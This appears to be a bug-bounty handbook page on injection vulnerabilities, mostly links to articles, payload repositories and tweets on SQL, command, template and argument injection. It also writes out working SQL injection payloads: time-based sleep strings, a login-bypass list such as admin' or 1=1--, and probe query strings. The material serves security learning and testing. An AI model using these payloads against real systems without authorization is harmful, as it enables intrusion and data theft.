> For the complete documentation index, see [llms.txt](https://gowthams.gitbook.io/bughunter-handbook/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://gowthams.gitbook.io/bughunter-handbook/list-of-vulnerabilities-bugs/sqli.md).

# Injection

**Blogs / Articles:**

* <https://medium.com/@jonathanbouman/blind-sql-injection-at-fasteditor-hema-com-6ac140c0d1a3>
* <https://threat.tevora.com/stop-collaborate-and-listen/> -Blind Command Injection - SSRF
* <https://www.quora.com/What-is-command-injection-and-how-does-it-work/answer/Jobert-Abma?share=8502ef38&srid=kl8Z>
* <https://gerbenjavado.com/manual-sql-injection-discovery-tips/>
* Practical JSONP Injection - [Practical JSONP Injection](https://securitycafe.ro/2017/01/18/practical-jsonp-injection/)
* XSLT Server Side Injection Attacks [https://contextis.com/blog/xslt-server-side-injection-attacks](https://t.co/ZqvTP3qZTZ?amp=1)
* Log Injection - <https://disconnect3d.pl/2018/02/24/log-injection-aka-tailing-logs-is-unsafe/>
* Remote Code Execution with EL injection - [https://betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html](https://t.co/eUvA6wDgFA?amp=1)
* Argument Injection - <https://www.nccgroup.com/us/about-us/newsroom-and-events/blog/2019/may/argument-injection-hammer/>
* Argument Injection - <https://staaldraad.github.io/post/2019-11-24-argument-injection/>
* Argument Injection - <https://docs.google.com/presentation/d/1U8r5CJs9dLOLO2-hj_bHidRMXugUl3ejv8Hdw6bDMv4/edit#slide=id.g29a70c6c35_0_68>
  * Video - <https://www.youtube.com/watch?v=FHiJnw9TTX8>
* **AST Injection, Prototype Pollution to RCE -** [**https://blog.p6.is/AST-Injection/#How-to-Detect**](https://blog.p6.is/AST-Injection/#How-to-Detect)
* **SSTI -** [**https://blog.isec.pl/beyond-ssti/**](https://blog.isec.pl/beyond-ssti/)
* [**https://bad-jubies.github.io/Blind-SQLi-1/**](https://bad-jubies.github.io/Blind-SQLi-1/)
* **Command Injection -**[**https://www.quora.com/What-is-command-injection-and-how-does-it-work/answer/Jobert-Abma?share=8502ef38\&srid=kl8Z**](https://www.quora.com/What-is-command-injection-and-how-does-it-work/answer/Jobert-Abma?share=8502ef38\&srid=kl8Z)
* [**https://medium.com/@dimazarno/bypassing-email-filter-which-leads-to-sql-injection-e57bcbfc6b17**](https://medium.com/@dimazarno/bypassing-email-filter-which-leads-to-sql-injection-e57bcbfc6b17)
* **CSS Injection -** [**https://medium.com/@tehmezovismayil/steal-input-datas-with-css-file-injection-bugbounty-449ba41a5092**](https://medium.com/@tehmezovismayil/steal-input-datas-with-css-file-injection-bugbounty-449ba41a5092)
* [**https://ansar0047.medium.com/blind-sql-injection-detection-and-exploitation-cheatsheet-17995a98fed1**](https://ansar0047.medium.com/blind-sql-injection-detection-and-exploitation-cheatsheet-17995a98fed1)
* [**https://medium.com/sud0root/bug-bounty-writeups-exploiting-sql-injection-vulnerability-20b019553716**](https://medium.com/sud0root/bug-bounty-writeups-exploiting-sql-injection-vulnerability-20b019553716)
* [**https://ismailtasdelen.medium.com/sql-injection-payload-list-b97656cfd66b**](https://ismailtasdelen.medium.com/sql-injection-payload-list-b97656cfd66b)
* **SQL Injection -** [**https://twitter.com/rodoassis/status/1438186092486877190?s=20**](https://twitter.com/rodoassis/status/1438186092486877190?s=20)
* [**https://outpost24.com/blog/X-forwarded-for-SQL-injection**](https://outpost24.com/blog/X-forwarded-for-SQL-injection)
* [How I Escalated a Time-Based SQL Injection to RCE](https://jmrcsnchz.medium.com/how-i-escalated-a-time-based-sql-injection-to-rce-bbf0d68cb398)
* #### <https://jmrcsnchz.medium.com/how-i-escalated-a-time-based-sql-injection-to-rce-bbf0d68cb398>

**Payloads / Cheatsheets:**

* <https://github.com/Gabriel-Labs/OOB-SQLi>
*

**Twitter Threads / Tips:**

* [**https://github.com/xer0days/SQLi-Query-Tampering**](https://github.com/xer0days/SQLi-Query-Tampering) **-** [**https://twitter.com/Xer0Days/status/1292488714241941504?s=20**](https://twitter.com/Xer0Days/status/1292488714241941504?s=20)
* [1. Time Based SQL Injection : Used payload: '+(select\*from(select(sleep(20)))a)+' in phone number parameter value for sign-in endpoint. Don't miss sign-in parameters \[Like username, email, otp\] for SQLi check. #bugbountytips 2. Reflected XSS + CSRF to Account Takeover : )](https://twitter.com/sunilyedla2/status/1333029227994628096?s=20)
* [Time based SQLi -> forgot password Endpoin](https://twitter.com/sunilyedla2/status/1339271046822678528?s=20)[1. Payload used: '%2b(select\*from(select(sleep(20)))a)%2b' 2. Endpoint: /Forgot password Cheers Do share your story in comments if you got SQLi at weird endpoint](https://twitter.com/sunilyedla2/status/1339271046822678528?s=20)
* SPEL Injection - <https://twitter.com/h1pmnh/status/1425831338234589184?s=20>
* EL Injection

{% embed url="<https://twitter.com/secalert/status/1119526862521282560?s=20>" %}

<br>

**Tools:**

**Other References:**

```
' or ''-'
" or ""-"
" or true--
' or true--
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
```

[Bug Bounty Tips This is how to find sql-Injection 100% of the time /?q=1 /?q=1' /?q=1" /?q=\[1\] /?q\[\]=1 /?q=1\` /?q=1\ /?q=1/\*'\*/ /?q=1/\*!1111'\*/ /?q=1'||'asd'||' <== concat string /?q=1' or '1'='1 /?q=1 or 1=1 /?q='or''=' #bugbounty #BugBountyTips #SqlInjection](https://twitter.com/community_bug/status/1345942914296205316?s=20)
